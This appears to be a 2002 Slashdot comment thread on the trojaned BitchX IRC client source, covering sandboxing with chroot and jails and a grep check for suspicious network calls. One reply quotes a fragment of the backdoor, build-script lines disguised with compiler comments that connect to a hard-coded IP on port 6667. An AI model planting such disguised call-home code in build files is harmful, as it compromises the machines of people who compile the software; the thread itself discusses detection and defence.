    by Per Wigren (5315) on Tuesday July 02, 2002 @10:38AM (#3807647) Homepage
    Isn't it the BitchX who is supposed to be backdoored, not her client?

  • by Animats (122034) on Tuesday July 02, 2002 @11:37AM (#3808048) Homepage
    IRC clients are a good place to start on security, because they need very limited access on the client machine. So put the client in a FreeBSD jail. All it needs to talk to is its window and the net, and maybe a few specific files.

    Jailing a browser is tougher, but an IRC client should be easy. Somebody who's into IRC and security should do this as a demo.

    • by Junta (36770) on Tuesday July 02, 2002 @12:01PM (#3808245)
      Actually, I would say both are equally 'tough' to jail. Network access is pretty much the same: both tend to use particular, specific ports, but circumstances can require just about anything, and though IRC clients deviate from the standard ports less than web browsers do, they still deviate.

      As far as filesystem access, neither *truly* requires write access to the disk, nor read access to anything more than a few config files. I know, browsers tend to use the disk as a cache and you want to download using your browser as well, but the same goes for IRC: a large portion of users exchange files through the IRC client with the intent that the transferred file not be transient. For those who want non-transient downloads (and the ability to save configuration, which both sorts of clients are equally likely to require), chroot is as far as I would go.

      Strictly speaking, all network applications have similar issues. While it may appear easy to pinpoint the required operations of a piece of software, there are always enough deviations to make it not 100% possible to tighten it all down. The only place where you can really predict, and jail based on those predictions, what a network application needs to do and access is on the server end, where you have the most control over how the network is used. Clients having to interoperate with oddball server configurations, and users who want to use the software in different ways, will always make the jailing you describe less feasible.

      Of course, most any app could run fine in a chrooted environment if you have the disk space for the requisite libraries, and that by itself greatly reduces (but doesn't eliminate) threats to data outside the chroot jail.
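      The mechanics of populating such a chroot jail look roughly like this (a sketch assuming a Linux-style ldd; actually entering the jail requires root, so that line is left commented out, and /bin/sh stands in here for the IRC client binary):

```shell
# Populate a minimal chroot jail: the target binary plus every shared
# library it links against. /bin/sh stands in for the IRC client.
JAIL=/tmp/ircjail
BIN=/bin/sh
mkdir -p "$JAIL/bin"
cp "$BIN" "$JAIL/bin/"

# ldd prints the resolved library paths; copy each one into the jail,
# preserving its directory layout so the dynamic linker can find it.
for lib in $(ldd "$BIN" | grep -o '/[^ )]*'); do
    mkdir -p "$JAIL$(dirname "$lib")"
    cp "$lib" "$JAIL$lib"
done

# chroot "$JAIL" /bin/sh   # as root: the process now sees only $JAIL
```

      Disk cost is just the binary and its libraries, which is the "if you have the disk space for the requisite libraries" caveat above.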
      • While it may appear easy to pinpoint required operations of a piece of software, there are always enough deviations to make it not 100% possible to tighten it all down.

        That assumes you don't modify the client. I'm proposing that the clients be modified to live within tight security restrictions. The general idea is that you put the app in a restricted environment and fix the app until it works there. Maybe some features won't work; those are turned off.

        The Unix/Linux world needs to make this work, as their response to Palladium. This is real security, not just signing and authentication.

        Something like LOMAC may be helpful here. Systrace is useful to find what needs to be fixed in apps, but that approach doesn't result in a policy without holes.

        IRC clients are a good place to start because 1) they get attacked quite a bit, and 2) they're not as big as browsers.

    • Take a look at: Systrace [umich.edu]
  • Look kids... (Score:4, Insightful)

    by ice-man_efnet (589707) on Tuesday July 02, 2002 @12:22PM (#3808407)
    The developers of BitchX did *NOT* put malicious code in the source. For one thing, there were two versions of the 1.0c19 source running around. It also seems that the security on *.bitchx.org was never even compromised. The problem lies somewhere with a 'man-in-the-middle' changing some DNS aliases somehow. This is why some people were able to download the real version that was actually released, and some people got the 'hacked' copy.

    Also, even though the box doesn't appear to be compromised, it could happen. I hope one of you kids out there is the first one attacked when a new apache or ssh bug is found. You can never be completely secure, especially when you are running anonymous servers for people to download programs.

    kthx.

    ice-man@efnet.

  • If I were interested in rooting a lot of machines, I might do it kind of like this:

    Waste many months of otherwise useful time writing an IRC client. Make sure it gets really popular by adding neato colors. Oh, and give it a name that's sure to offend my mother.

    Wait until everyone trusts me, then throw something slightly more interesting into the mix. Like a blatant back door. Hope no one notices.

    Screw with my FTP server and make it look hacked, to ensure deniability.

    Assume global emperorship.

    Of course, if I had done it, I would have made it more subtle. Perhaps a hard-to-find buffer overflow in CTCP handling, or such...

    (The preceding was a JOKE...)

  • How about a simple "egrep -nr 'socket|connect' *" before running configure and compiling the software? If you see any lines in the output and don't understand why they are there, you shouldn't run configure or compile the software. IMO, if you don't know why you should check for at least socket, you shouldn't be compiling software at all.

    Granted, an exploit could be hidden from such a simple check, but it still seems that the above would be enough to prevent most backdoors.
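    Here is what that check looks like in practice, run against a mock source tree containing the kind of line found in the trojaned configure script (the directory and file below are fabricated for the example; adding inet_addr and a dotted-quad IP pattern to the grep catches hard-coded addresses too):

```shell
# Build a mock source tree containing a suspicious hard-coded connection.
mkdir -p demo-src
cat > demo-src/configure <<'EOF'
# ...ordinary-looking autoconf boilerplate...
sa.sin_addr.s_addr = inet_addr ("213.77.115.17");
EOF

# Grep for network calls and literal IP addresses before running configure.
grep -E -nr 'socket|connect|inet_addr|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' demo-src
```

    Any hit you can't explain (here, an inet_addr call with a literal IP in a build script) is reason enough not to build.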

    • Notice how the code is nicely commented? Makes it look legit:
      +/* We use char because int might match the return type of a gcc2
      + builtin and then its argument prototype would still apply. */
      + sa.sin_port = htons (6667);
      + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
      +/* Override any gcc2 internal prototype to avoid an error. */
      Dammit, so that's why my `egrep -nr 'h4x0r|gr33tz' *` didn't work =D
